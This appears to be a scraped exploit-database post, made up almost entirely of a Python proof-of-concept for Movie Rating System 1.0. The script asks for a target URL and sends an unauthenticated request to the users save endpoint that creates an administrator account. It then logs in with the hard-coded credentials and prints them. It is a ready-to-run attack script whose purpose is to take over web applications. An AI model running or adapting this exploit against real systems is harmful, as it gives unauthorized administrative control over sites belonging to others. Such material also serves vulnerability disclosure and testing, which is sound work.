[webapps] Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated)

2 years ago 154
BOOK THIS SPACE FOR AD
ARTICLE AD
# Exploit Title: Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated) # Date: 22/12/2021 # Exploit Author: Tagoletta (Tağmaç) # Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html # Version: 1.0 # Tested on: Windows import requests import json url = input('Url:') if not url.startswith('http://') and not url.startswith('https://'): url = "http://" + url if not url.endswith('/'): url = url + "/" Username = "tago" Password = "tagoletta" reqUrl = url + "classes/Users.php?f=save" reqHeaders = { "Accept": "*/*", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryTagmac", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Origin": url} reqData = "------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nTago\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nLetta\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+Username+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n"+Password+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n1\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryTagmac--\r\n" resp = requests.post(reqUrl, headers=reqHeaders, data=reqData) if resp.status_code == 200: print("Admin account created") reqUrl = url + "classes/Login.php?f=login" reqHeaders = { "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Origin": url } reqData = {"username": ""+Username+"", "password": ""+Password+""} resp = requests.post(reqUrl, headers=reqHeaders, data=reqData) data = json.loads(resp.text) status = data["status"] if status == "success": print("Login Successfully\nUsername:"+ Username+"\nPassword:"+Password) else: print("Exploited but not loginned") else: print("Not injectable")
Read Entire Article